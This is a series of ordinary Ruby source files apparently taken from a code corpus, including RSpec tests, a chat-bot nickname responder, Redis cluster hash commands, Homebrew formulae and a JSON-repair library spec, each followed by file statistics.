RSpec.describe Vote, type: :model do
before :each do
text = 'The Teams page contains a listing of the various Community Teams,
their responsibilities, links to their Wiki Home Pages and leaders,
communication tools, and a quick reference to let you know whether
Most Teams’ Wiki Home Pages provide information about who they are,
what they do, when their meetings are, and how to contact them.
Using these pages, teammates are able to communicate and
LooTeamsFor participating on the Country area team contributing to
a Local Development of Localization and Internationalization and
Like most communities, we have our rules and governing body.
Anyone can join and participate in most, if not all, of our Teams
and Projects. But if you want an “@ubuntu.com” e-mail address, it
has to be earned. Find out how in our Membership section.
As an active member of our community, you probably should check out
what else is going on in the world of Ubuntu:
The Fridge articles all the latest News and Upcoming Events.
Planet Ubuntu is a collection of community blogs.
If you are interested in getting to know other Ubuntu users or
seeing a list of Ubuntu teams outside the general Ubuntu world,
check out our social network. '
@user = User.create!(email: '[email protected]', name: 'foo bar', password: 'foobar')
@article = Article.create(title: 'title123', text: 'text123', author_id: @user.id)
@article2 = Article.create(title: 'title123', text: text, author_id: @user.id)
@vote = Vote.create(user_id: @user.id, article_id: @article.id)
end
context 'with valid details' do
it 'should create a vote' do
expect(@article.votes.count).to eq(1)
end
end
context 'with valid details' do
it 'should submit a users vote on article' do
expect(@article.votes.count).to eq(1)
end
end
end
| 46.777778 | 91 | 0.675534 |
f78ef801d15bbb1b25c5f3ac5be0b8f09bd05853 | 1,874 | # encoding: UTF-8
require "net/http"
require "nokogiri"
class NicknameResponder < Bitbot::Responder
include Bitbot::Responder::Wit
WORLDS = {
pirate: {
uri: "http://mess.be/pirate-names-male.php",
response: "Arrr! Yer pirate name be {{nick}}",
selector: ".normalText font b"
},
wutang: {
uri: "http://mess.be/inickgenwuname.php",
response: "Your Wu-Tang Clan name is {{nick}}",
selector: "center b font:not(.normalText)"
},
blues: {
uri: "http://mess.be/inickgenbluesmalename.php",
response: "Welcome to the Crossroads, {{nick}}",
selector: "center > .boldText"
},
potter: {
uri: "http://mess.be/harry-potter-names-male.php",
response: "Here is your wizarding name: {{nick}}",
selector: "center .normalText font b"
},
hacker: {
uri: "http://mess.be/inickgenhacker.php",
response: "Welcome to the Matrix, {{nick}}",
selector: "center > p.normalText > b"
}
}
category "Miscellaneous"
help "misc:nickname <world>",
description: "Your nickname for a given world (e.g. pirate, wutang, blues, potter, hacker)",
examples: ["what's my hacker nickname?", "if I were in harry potter, my nick name is?"]
intent "nickname", :nickname, entities: { nickname_world: nil }
route :nickname, /^misc:nickname\s+(.*)$/i do |world_type|
world = WORLDS[world_type.to_sym]
raise(Bitbot::Response, "I don't know of this \"#{world_type}\" world.") unless world
respond_with(world[:response].gsub("{{nick}}", nickname_for_world(world)))
end
private
def nickname_for_world(world)
res = Net::HTTP.post_form(URI.parse(world[:uri]), realname: message.user_name)
nick = Nokogiri::HTML(res.body).css(world[:selector]).map(&:text).join(" ")
nick.gsub(/\n/, " ").gsub(/\s+/, " ").gsub(/^\s|\s$/, "")
end
end
| 31.762712 | 99 | 0.622732 |
28066c52773865f051113027edf9a9e7ab01f385 | 1,480 | require File.expand_path(File.dirname(__FILE__) + '/edgecase')
class DiceSet
attr_reader :values
def roll(n)
@values = (1..n).map { rand(6) + 1 }
end
end
class AboutDiceSet < EdgeCase::Koan
def test_can_create_a_dice_set
dice = DiceSet.new
assert_not_nil dice
end
def test_rolling_the_dice_returns_a_set_of_integers_between_1_and_6
dice = DiceSet.new
dice.roll(5)
assert dice.values.is_a?(Array), "should be an array"
assert_equal 5, dice.values.size
dice.values.each do |value|
assert value >= 1 && value <= 6, "value #{value} must be between 1 and 6"
end
end
def test_dice_values_do_not_change_unless_explicitly_rolled
dice = DiceSet.new
dice.roll(5)
first_time = dice.values
second_time = dice.values
assert_equal first_time, second_time
end
def test_dice_values_should_change_between_rolls
dice = DiceSet.new
dice.roll(5)
first_time = dice.values
dice.roll(5)
second_time = dice.values
assert_not_equal first_time, second_time,
"Two rolls should not be equal"
# THINK ABOUT IT:
#
# If the rolls are random, then it is possible (although not
# likely) that two consecutive rolls are equal. What would be a
# better way to test this.
end
def test_you_can_roll_different_numbers_of_dice
dice = DiceSet.new
dice.roll(3)
assert_equal 3, dice.values.size
dice.roll(1)
assert_equal 1, dice.values.size
end
end
| 22.769231 | 79 | 0.700676 |
ff1e08b6950dc46ce029aacf68978f549b3e4b36 | 1,225 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require 'spec_helper'
describe Elasticsearch::DSL::Search::Aggregations::Sum do
let(:search) do
described_class.new
end
describe '#to_hash' do
it 'can be converted to a hash' do
expect(search.to_hash).to eq(sum: {})
end
end
context '#initialize' do
let(:search) do
described_class.new(foo: 'bar')
end
it 'takes a hash' do
expect(search.to_hash).to eq(sum: { foo: 'bar' })
end
end
end
| 27.840909 | 63 | 0.721633 |
61c10d47434bf7c6a74b51279bf136474f23e6a7 | 6,543 | require 'spec_helper'
describe Gitlab::HealthChecks::FsShardsCheck do
def command_exists?(command)
_, status = Gitlab::Popen.popen(%W{ #{command} 1 echo })
status == 0
rescue Errno::ENOENT
false
end
def timeout_command
@timeout_command ||=
if command_exists?('timeout')
'timeout'
elsif command_exists?('gtimeout')
'gtimeout'
else
''
end
end
let(:metric_class) { Gitlab::HealthChecks::Metric }
let(:result_class) { Gitlab::HealthChecks::Result }
let(:repository_storages) { [:default] }
let(:tmp_dir) { Dir.mktmpdir }
let(:storages_paths) do
{
default: { path: tmp_dir }
}.with_indifferent_access
end
before do
allow(described_class).to receive(:repository_storages) { repository_storages }
allow(described_class).to receive(:storages_paths) { storages_paths }
stub_const('Gitlab::HealthChecks::FsShardsCheck::TIMEOUT_EXECUTABLE', timeout_command)
end
after do
FileUtils.remove_entry_secure(tmp_dir) if Dir.exist?(tmp_dir)
end
shared_examples 'filesystem checks' do
describe '#readiness' do
subject { described_class.readiness }
context 'storage points to not existing folder' do
let(:storages_paths) do
{
default: { path: 'tmp/this/path/doesnt/exist' }
}.with_indifferent_access
end
it { is_expected.to include(result_class.new(false, 'cannot stat storage', shard: :default)) }
end
context 'storage points to directory that has both read and write rights' do
before do
FileUtils.chmod_R(0755, tmp_dir)
end
it { is_expected.to include(result_class.new(true, nil, shard: :default)) }
it 'cleans up files used for testing' do
expect(described_class).to receive(:storage_write_test).with(any_args).and_call_original
subject
expect(Dir.entries(tmp_dir).count).to eq(2)
end
context 'read test fails' do
before do
allow(described_class).to receive(:storage_read_test).with(any_args).and_return(false)
end
it { is_expected.to include(result_class.new(false, 'cannot read from storage', shard: :default)) }
end
context 'write test fails' do
before do
allow(described_class).to receive(:storage_write_test).with(any_args).and_return(false)
end
it { is_expected.to include(result_class.new(false, 'cannot write to storage', shard: :default)) }
end
end
end
describe '#metrics' do
subject { described_class.metrics }
context 'storage points to not existing folder' do
let(:storages_paths) do
{
default: { path: 'tmp/this/path/doesnt/exist' }
}.with_indifferent_access
end
it { is_expected.to all(have_attributes(labels: { shard: :default })) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_accessible, value: 0)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_readable, value: 0)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_writable, value: 0)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_access_latency, value: be >= 0)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_read_latency, value: be >= 0)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_write_latency, value: be >= 0)) }
end
context 'storage points to directory that has both read and write rights' do
before do
FileUtils.chmod_R(0755, tmp_dir)
end
it { is_expected.to all(have_attributes(labels: { shard: :default })) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_accessible, value: 1)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_readable, value: 1)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_writable, value: 1)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_access_latency, value: be >= 0)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_read_latency, value: be >= 0)) }
it { is_expected.to include(an_object_having_attributes(name: :filesystem_write_latency, value: be >= 0)) }
end
end
end
context 'when timeout kills fs checks' do
before do
stub_const('Gitlab::HealthChecks::FsShardsCheck::COMMAND_TIMEOUT', '1')
allow(described_class).to receive(:exec_with_timeout).and_wrap_original { |m| m.call(%w(sleep 60)) }
FileUtils.chmod_R(0755, tmp_dir)
end
describe '#readiness' do
subject { described_class.readiness }
it { is_expected.to include(result_class.new(false, 'cannot stat storage', shard: :default)) }
end
describe '#metrics' do
subject { described_class.metrics }
it 'provides metrics' do
expect(subject).to all(have_attributes(labels: { shard: :default }))
expect(subject).to include(an_object_having_attributes(name: :filesystem_accessible, value: 0))
expect(subject).to include(an_object_having_attributes(name: :filesystem_readable, value: 0))
expect(subject).to include(an_object_having_attributes(name: :filesystem_writable, value: 0))
expect(subject).to include(an_object_having_attributes(name: :filesystem_access_latency, value: be >= 0))
expect(subject).to include(an_object_having_attributes(name: :filesystem_read_latency, value: be >= 0))
expect(subject).to include(an_object_having_attributes(name: :filesystem_write_latency, value: be >= 0))
end
end
end
context 'when popen always finds required binaries' do
before do
allow(described_class).to receive(:exec_with_timeout).and_wrap_original do |method, *args, &block|
begin
method.call(*args, &block)
rescue RuntimeError, Errno::ENOENT
raise 'expected not to happen'
end
end
stub_const('Gitlab::HealthChecks::FsShardsCheck::COMMAND_TIMEOUT', '10')
end
it_behaves_like 'filesystem checks'
end
context 'when popen never finds required binaries' do
before do
allow(Gitlab::Popen).to receive(:popen).and_raise(Errno::ENOENT)
end
it_behaves_like 'filesystem checks'
end
end
| 35.754098 | 116 | 0.678282 |
e99e7cf4a3fe9e21ba184f8498bf422335e13170 | 1,614 | #
# Be sure to run `pod lib lint XMX_NetWorking.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'XMX_NetWorking'
s.version = '0.1.0'
s.summary = 'A short description of XMX_NetWorking.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/736497373/XMX_NetWorking'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { '736497373' => '[email protected]' }
s.source = { :git => 'https://github.com/736497373/XMX_NetWorking.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '8.0'
s.source_files = 'XMX_NetWorking/Classes/**/*'
# s.resource_bundles = {
# 'XMX_NetWorking' => ['XMX_NetWorking/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
s.dependency 'AFNetworking'
end
| 37.534884 | 108 | 0.648079 |
ab443c264110cf251d2ce1d2d9d9e0ca38307603 | 375 | class NodeClassMembership < ApplicationRecord
validates_presence_of :node_id, :node_class_id
include NodeGroupGraph
has_parameters
belongs_to :node
belongs_to :node_class
fires :added_to, :on => :create, :subject => :node_class, :secondary_subject => :node
fires :removed_from, :on => :destroy, :subject => :node_class, :secondary_subject => :node
end
| 26.785714 | 92 | 0.738667 |
1a91180b87779c5efd5cdd4f7fa87c18d18b81f4 | 3,450 | module HQMF1
# Represents a data criteria specification
class DataCriteria
include HQMF1::Utilities
attr_accessor :code_list_id, :derived_from, :definition, :status, :negation, :specific_occurrence
# Create a new instance based on the supplied HQMF entry
# @param [Nokogiri::XML::Element] entry the parsed HQMF entry
def initialize(entry, occurrence_counters)
@entry = entry
template_map = HQMF::DataCriteria.get_template_id_map()
oid_xpath_file = File.expand_path('../data_criteria_oid_xpath.json', __FILE__)
oid_xpath_map = JSON.parse(File.read(oid_xpath_file))
template_id = attr_val('cda:act/cda:templateId/@root') || attr_val('cda:observation/cda:templateId/@root')
# check to see if this is a derived data criteria. These are used for multiple occurrences.
derived_entry = @entry.at_xpath('./*/cda:sourceOf[@typeCode="DRIV"]')
if derived_entry
derived = derived_entry.at_xpath('cda:act/cda:id/@root') || derived_entry.at_xpath('cda:observation/cda:id/@root')
@derived_from = derived.value
occurrence_counters[@derived_from] ||= HQMF::InstanceCounter.new
@occurrence_key = occurrence_counters[@derived_from].next-1
@specific_occurrence = "#{('A'..'ZZ').to_a[@occurrence_key]}"
end
template = template_map[template_id]
if template
@negation=template["negation"]
@definition=template["definition"]
@status=template["status"]
@key=@definition+(@status.empty? ? '' : "_#{@status}")
else
raise "Unknown data criteria template identifier [#{template_id}]"
end
# Get the code list OID of the criteria, used as an index to the code list database
@code_list_id = attr_val(oid_xpath_map[@key]['oid_xpath'])
unless @code_list_id
puts "\tcode list id not found, getting default" if !@derived_from
@code_list_id = attr_val('cda:act/cda:sourceOf//cda:code/@code')
end
puts "\tno oid defined for data criteria: #{@key}" if !@code_list_id and !@derived_from
end
# Get the identifier of the criteria, used elsewhere within the document for referencing
# @return [String] the identifier of this data criteria
def id
attr_val('cda:act/cda:id/@root') || attr_val('cda:observation/cda:id/@root')
end
# Get the title of the criteria, provides a human readable description
# @return [String] the title of this data criteria
def title
title = description
title = "Occurrence #{@specific_occurrence}: #{title}" if @derived_from
title
end
def description
if (@entry.at_xpath('.//cda:title'))
description = @entry.at_xpath('.//cda:title').inner_text
else
description = @entry.at_xpath('.//cda:localVariableName').inner_text
end
description
end
# Get a JS friendly constant name for this measure attribute
def const_name
components = title.gsub(/\W/,' ').split.collect {|word| word.strip.upcase }
if @derived_from
components << HQMF::Counter.instance.next
end
components.join '_'
end
def to_json
json = build_hash(self, [:id,:title,:code_list_id,:derived_from,:description, :definition, :status, :negation, :specific_occurrence])
{
self.const_name => json
}
end
end
end | 37.5 | 139 | 0.656522 |
210f32424336439c98b9a08d225817322c904f08 | 4,621 | # frozen_string_literal: true
require 'redis'
class RedisCluster
module Function
# Hash implement redis hashes commands. There will be some adjustment for cluster.
# see https://redis.io/commands#hash. Most of the code are copied from
# https://github.com/redis/redis-rb/blob/master/lib/redis.rb.
#
# SETTER = [:hdel, :hincrby, :hincrbyfloat, :hmset, :hset, :hsetnx]
# GETTER = [:hexists, :hget, :hgetall, :hkeys, :hlen, :hmget, :hstrlen, :hvals, :hscan]
module Hash
# Delete one or more hash fields.
#
# @param [String] key
# @param [String, Array<String>] field
# @return [Fixnum] the number of fields that were removed from the hash
def hdel(key, field)
call(key, [:hdel, key, field])
end
# Increment the integer value of a hash field by the given integer number.
#
# @param [String] key
# @param [String] field
# @param [Fixnum] increment
# @return [Fixnum] value of the field after incrementing it
def hincrby(key, field, increment)
call(key, [:hincrby, key, field, increment])
end
# Increment the numeric value of a hash field by the given float number.
#
# @param [String] key
# @param [String] field
# @param [Float] increment
# @return [Float] value of the field after incrementing it
def hincrbyfloat(key, field, increment)
call(key, [:hincrbyfloat, key, field, increment], transform: Redis::Floatify)
end
# Set one or more hash values.
#
# @example
# redis.hmset("hash", "f1", "v1", "f2", "v2")
# # => "OK"
#
# @param [String] key
# @param [Array<String>] attrs array of fields and values
# @return [String] `"OK"`
def hmset(key, *attrs)
call(key, [:hmset, key] + attrs)
end
# Set the string value of a hash field.
#
# @param [String] key
# @param [String] field
# @param [String] value
# @return [Boolean] whether or not the field was **added** to the hash
def hset(key, field, value)
call(key, [:hset, key, field, value], transform: Redis::Boolify)
end
# Set the value of a hash field, only if the field does not exist.
#
# @param [String] key
# @param [String] field
# @param [String] value
# @return [Boolean] whether or not the field was **added** to the hash
def hsetnx(key, field, value)
call(key, [:hsetnx, key, field, value], transform: Redis::Boolify)
end
# Determine if a hash field exists.
#
# @param [String] key
# @param [String] field
# @return [Boolean] whether or not the field exists in the hash
def hexists(key, field)
call(key, [:hexists, key, field], transform: Redis::Boolify, read: true)
end
# Get the value of a hash field.
#
# @param [String] key
# @param [String] field
# @return [String]
def hget(key, field)
call(key, [:hget, key, field], read: true)
end
# Get all the fields and values in a hash.
#
# @param [String] key
# @return [Hash<String, String>]
def hgetall(key)
call(key, [:hgetall, key], transform: Redis::Hashify, read: true)
end
# Get all the fields in a hash.
#
# @param [String] key
# @return [Array<String>]
def hkeys(key)
call(key, [:hkeys, key], read: true)
end
# Get all the values in a hash.
#
# @param [String] key
# @return [Array<String>]
def hvals(key)
call(key, [:hvals, key], read: true)
end
# Get the number of fields in a hash.
#
# @param [String] key
# @return [Fixnum] number of fields in the hash
def hlen(key)
call(key, [:hlen, key], read: true)
end
# Get the values of all the given hash fields.
#
# @example
# redis.hmget("hash", "f1", "f2")
# # => ["v1", "v2"]
#
# @param [String] key
# @param [Array<String>] fields array of fields
# @return [Array<String>] an array of values for the specified fields
def hmget(key, *fields)
call(key, [:hmget, key] + fields, read: true)
end
# Returns the string length of the value associated with field in the hash stored at key.
#
# @param [String] key
# @param [String] field
# @return [Fixnum] String lenght
def hstrlen(key, field)
call(key, [:hstrlen, key, field], read: true)
end
end
end
end
| 30.401316 | 95 | 0.571521 |
6aaf12058f406175c1bfdd04a3cebce243e2e71b | 1,824 | # Copyright (c) 2018 Public Library of Science
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# +PaperRoleUsersController+ is responsible for communicating eligible users for
# a given paper and role.
class PaperRoleEligibleUsersController < ApplicationController
before_action :authenticate_user!
respond_to :json
def index
requires_user_can(:view_user_role_eligibility_on_paper, paper)
role = Role.find_by!(id: params[:role_id], journal_id: paper.journal_id)
eligible_users = EligibleUserService.eligible_users_for(
paper: paper,
role: role,
matching: params[:query]
)
render json: eligible_users, each_serializer: SensitiveInformationUserSerializer, root: 'users'
end
private
def paper
@paper ||= Paper.find_by_id_or_short_doi(params[:paper_id])
end
end
| 41.454545 | 99 | 0.774123 |
613067776b182dfa874138899fb3e8d73a958f13 | 315 | # frozen_string_literal: true
class SummariesController < ApplicationController
before_action :authenticate_user!
# Render the summary dashboard for a patron
#
# GET /summaries
# GET /summaries.json
def index
@patron = patron
end
private
def item_details
{ all: true }
end
end
| 15.75 | 49 | 0.701587 |
7ab8a80819f894564f69bb7bb0744f2574272d7f | 517 | require "did_you_mean/version"
require "did_you_mean/core_ext/name_error"
require "did_you_mean/spell_checkable"
require 'did_you_mean/spell_checkers/name_error_checkers'
require 'did_you_mean/spell_checkers/method_name_checker'
require 'did_you_mean/spell_checkers/null_checker'
require "did_you_mean/formatter"
module DidYouMean
IGNORED_CALLERS = []
SPELL_CHECKERS = Hash.new(NullChecker)
SPELL_CHECKERS.merge!({
"NameError" => NameErrorCheckers,
"NoMethodError" => MethodNameChecker
})
end
| 25.85 | 57 | 0.802708 |
5dc810076a3b528795d025780e959b1b1089922a | 1,388 | class Fonttools < Formula
include Language::Python::Virtualenv
desc "Library for manipulating fonts"
homepage "https://github.com/fonttools/fonttools"
url "https://files.pythonhosted.org/packages/47/7c/dd9dc174842a9bc6fdae89045e820acd8a53a2251b4a8e6d22c97e1c7d75/fonttools-4.25.2.zip"
sha256 "507f8e027967fe4ebfa913856b3acc6b77201e67d6a6978d3666863cbba884c3"
license "MIT"
head "https://github.com/fonttools/fonttools.git"
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "c3bf47619aeffa821430c617aad930604f8ba9393cdf3b37d7fa9cb664785356"
sha256 cellar: :any_skip_relocation, big_sur: "5395d770cb2e91c3c1fd28cefed3e987f6a145cac25890aef363cc8769db66ae"
sha256 cellar: :any_skip_relocation, catalina: "5395d770cb2e91c3c1fd28cefed3e987f6a145cac25890aef363cc8769db66ae"
sha256 cellar: :any_skip_relocation, mojave: "5395d770cb2e91c3c1fd28cefed3e987f6a145cac25890aef363cc8769db66ae"
sha256 cellar: :any_skip_relocation, x86_64_linux: "2b4497b37560c090f7d41897d673686768499411ffb0cacfb665f60fcc228966"
end
depends_on "[email protected]"
def install
virtualenv_install_with_resources
end
test do
on_macos do
cp "/System/Library/Fonts/ZapfDingbats.ttf", testpath
system bin/"ttx", "ZapfDingbats.ttf"
end
on_linux do
assert_match "usage", shell_output("#{bin}/ttx -h")
end
end
end
| 39.657143 | 135 | 0.791066 |
bf8e1a776a408567f05cc05a71d7ec0e4db588c2 | 5,919 |
require 'rspec'
require 'json'
require 'yajl'
require 'oj'
require 'drjson'
describe DrJson do
def doctor
DrJson.new(:debug => true)
end
describe "completion" do
it "works" do
doctor.repair("{").should == "{}"
end
it "insert the object value if absent" do
doctor.repair('{"foo": ').should == '{"foo": null}'
end
it "closes array brackets" do
doctor.repair("[42").should == "[42]"
end
it "inserts missing trailing array elements" do
doctor.repair("[42,").should == "[42,null]"
doctor.repair("[42,7,").should == "[42,7,null]"
end
it "works" do
doctor.repair('{"foo": [42 ').should == '{"foo": [42 ]}'
doctor.repair('{"foo": [ ').should == '{"foo": [ ]}'
end
it "works" do
doctor.repair('{"foo": "bar').should == '{"foo": "bar"}'
doctor.repair('{"foo": "ba').should == '{"foo": "ba"}'
doctor.repair('{"foo": "').should == '{"foo": ""}'
doctor.repair('{"foo": ').should == '{"foo": null}'
doctor.repair('{"foo" ').should == '{"foo" :null}'
doctor.repair('{"foo ').should == '{"foo ":null}'
doctor.repair('{"foo').should == '{"foo":null}'
doctor.repair('{"f').should == '{"f":null}'
doctor.repair('{"').should == '{"":null}'
doctor.repair('{').should == '{}'
end
end
it "works" do
doctor.repair("[]").should == "[]"
doctor.repair("[42]").should == "[42]"
doctor.repair('{"foo": "bar"}').should == '{"foo": "bar"}'
end
it "empty strings" do
doctor.repair('{"":""}').should == '{"":""}'
end
it "works" do
doctor.repair('{"foo": 42 }').should == '{"foo": 42 }'
doctor.repair('{"foo": 42}').should == '{"foo": 42}'
end
it "multiline completion" do
doctor.repair('{"foo": "bar').should == '{"foo": "bar"}'
end
it "works" do
doctor.repair('{"foo": 42, "bar": 7 }').should == '{"foo": 42, "bar": 7 }'
end
it "works" do
doctor.repair('{"foo": {"bar" : "baz"} }').should == '{"foo": {"bar" : "baz"} }'
doctor.repair('{"foo": {"bar" : "baz').should == '{"foo": {"bar" : "baz"}}'
end
it "works" do
doctor.repair('{"foo": [] }').should == '{"foo": [] }'
doctor.repair('{"foo": [42] }').should == '{"foo": [42] }'
end
it "handles inclomplete (null|false|true) tokens" do
DrJson.new.repair('[tru').should == '[]'
DrJson.new.repair('[fals').should == '[]'
DrJson.new.repair('[nul').should == '[]'
end
it "handles inclomplete (null|false|true) tokens" do
DrJson.new.repair('[[tru').should == '[[]]'
DrJson.new.repair('[[[fal').should == '[[[]]]'
DrJson.new.repair('[[[[nul').should == '[[[[]]]]'
end
it "handles inclomplete (null|false|true) values" do
DrJson.new.repair('{"foo":tru').should == '{"foo":null}'
DrJson.new.repair('{"foo":{"bar":tru').should == '{"foo":{"bar":null}}'
end
it "handles inclomplete keys in pairs" do
DrJson.new.repair('{"foo').should == '{"foo":null}'
end
it "works" do
doctor.repair('{"foo": [42,7] }').should == '{"foo": [42,7] }'
doctor.repair('{"foo": [42, 7] }').should == '{"foo": [42, 7] }'
doctor.repair('{"foo": [42 ,7] }').should == '{"foo": [42 ,7] }'
doctor.repair('{"foo": [42 , 7] }').should == '{"foo": [42 , 7] }'
doctor.repair('{"foo": [42 , 7, 4711] }').should == '{"foo": [42 , 7, 4711] }'
end
it "supports all the null|false|true terminal symbols" do
doctor.repair('[null]').should == '[null]'
doctor.repair('[true]').should == '[true]'
doctor.repair('[false]').should == '[false]'
end
context "numbers" do
it "supports -" do
doctor.repair('{"foo": -42 }').should == '{"foo": -42 }'
end
it "supports floats" do
doctor.repair('{"foo": 7.42 }').should == '{"foo": 7.42 }'
end
it "supports exponents" do
doctor.repair('{"foo": 1e-4 }').should == '{"foo": 1e-4 }'
doctor.repair('{"foo": 1E-4 }').should == '{"foo": 1E-4 }'
doctor.repair('{"foo": 1e+4 }').should == '{"foo": 1e+4 }'
doctor.repair('{"foo": 1E+4 }').should == '{"foo": 1E+4 }'
doctor.repair('{"foo": 1e4 }').should == '{"foo": 1e4 }'
doctor.repair('{"foo": 1E4 }').should == '{"foo": 1E4 }'
end
end
it "knows escape sequences" do
doctor.repair('{"foo": "\"" }').should == '{"foo": "\"" }'
doctor.repair('{"foo": "\\\\" }').should == '{"foo": "\\\\" }'
doctor.repair('{"foo": "\/" }').should == '{"foo": "\/" }'
doctor.repair('{"foo": "\b" }').should == '{"foo": "\b" }'
doctor.repair('{"foo": "\f" }').should == '{"foo": "\f" }'
doctor.repair('{"foo": "\n" }').should == '{"foo": "\n" }'
doctor.repair('{"foo": "\r" }').should == '{"foo": "\r" }'
doctor.repair('{"foo": "\t" }').should == '{"foo": "\t" }'
doctor.repair('{"foo": "\u4711" }').should == '{"foo": "\u4711" }'
doctor.repair('{"foo": "\ubeef" }').should == '{"foo": "\ubeef" }'
end
it "does not break on unexpected input, it tries to fix it" do
broken_json ='{"foo": ["beef" {][] senseless'
repaired_json = '{"foo": ["beef" ]}'
DrJson.new.repair(broken_json).should == repaired_json
end
it "indicates unexpected input in debug mode" do
broken_json ='{"foo": "beef" {'
lambda {DrJson.new(:debug => true).repair(broken_json)}.should raise_error DrJson::UnexpectedTokenError
end
context "pass-through behavior for real life files" do
json_files = Dir.glob("spec/fixtures/yajl-ruby/*.json")
json_files.each do |file|
describe "#{file}" do
it "is parseable with Oj: #{file}" do
Oj.load(File.read(file))
end
it "is parseable with Yajl: #{file}" do
Yajl::Parser.parse(File.read(file))
end
it "does pass through correct, real life file #{file}" do
test_file(file)
end
end
end
end
def test_file(file_name)
json_str = File.read (file_name)
repaired = doctor.repair(json_str)
repaired.should == json_str
end
end
| 33.822857 | 107 | 0.531002 |
879ce1d6993e7b4a0e8ad1404b07e4c1ace23d83 | 570 | cask "artisan" do
version "2.4.2"
sha256 "3abdc8dc2f4db568da5405be0de36e138bb5d11ee13abac801b3c28bf29b9c45"
# github.com/artisan-roaster-scope/artisan/ was verified as official when first introduced to the cask
url "https://github.com/artisan-roaster-scope/artisan/releases/download/v#{version}/artisan-mac-#{version}.dmg"
appcast "https://github.com/artisan-roaster-scope/artisan/releases.atom"
name "Artisan"
desc "Visual scope for coffee roasters"
homepage "https://artisan-scope.org/"
depends_on macos: ">= :high_sierra"
app "Artisan.app"
end
| 35.625 | 113 | 0.764912 |
0891ed63d8bc9e80c3c83c21eddca947aff7fffa | 1,967 | class NatsServer < Formula
desc "Lightweight cloud messaging system"
homepage "https://nats.io"
url "https://github.com/nats-io/nats-server/archive/v2.1.2.tar.gz"
sha256 "2fdbda70191ba02f3e065b0d2d503236865c60e88fa4a7c7e0eae691e7e32b2d"
head "https://github.com/nats-io/nats-server.git"
bottle do
cellar :any_skip_relocation
sha256 "4edb45f19824f760294780d6b365916ee23c514acfc183d3fe9d52fbb4a189a9" => :catalina
sha256 "aa5771424fa936d191a62e0e7cdd4c3aa2bfe2ac6cd3869419015ae3808bd426" => :mojave
sha256 "48c033283b086a6540f0d26b4e0782de589b1b1e481968bdc6f96b86b3549f19" => :high_sierra
sha256 "8844b9be6d3acc703b99e66a4785dd25bd6df68ec1e205bf4d86993b54db4fdc" => :x86_64_linux
end
depends_on "go" => :build
def install
ENV["GOPATH"] = buildpath
ENV["GO111MODULE"] = "off"
mkdir_p "src/github.com/nats-io"
ln_s buildpath, "src/github.com/nats-io/nats-server"
buildfile = buildpath/"src/github.com/nats-io/nats-server/main.go"
system "go", "build", "-v", "-o", bin/"nats-server", buildfile
end
plist_options :manual => "nats-server"
def plist; <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_bin}/nats-server</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
test do
pid = fork do
exec bin/"nats-server",
"--port=8085",
"--pid=#{testpath}/pid",
"--log=#{testpath}/log"
end
sleep 3
begin
assert_match version.to_s, shell_output("curl localhost:8085")
assert_predicate testpath/"log", :exist?
ensure
Process.kill "SIGINT", pid
Process.wait pid
end
end
end
| 30.261538 | 106 | 0.661413 |
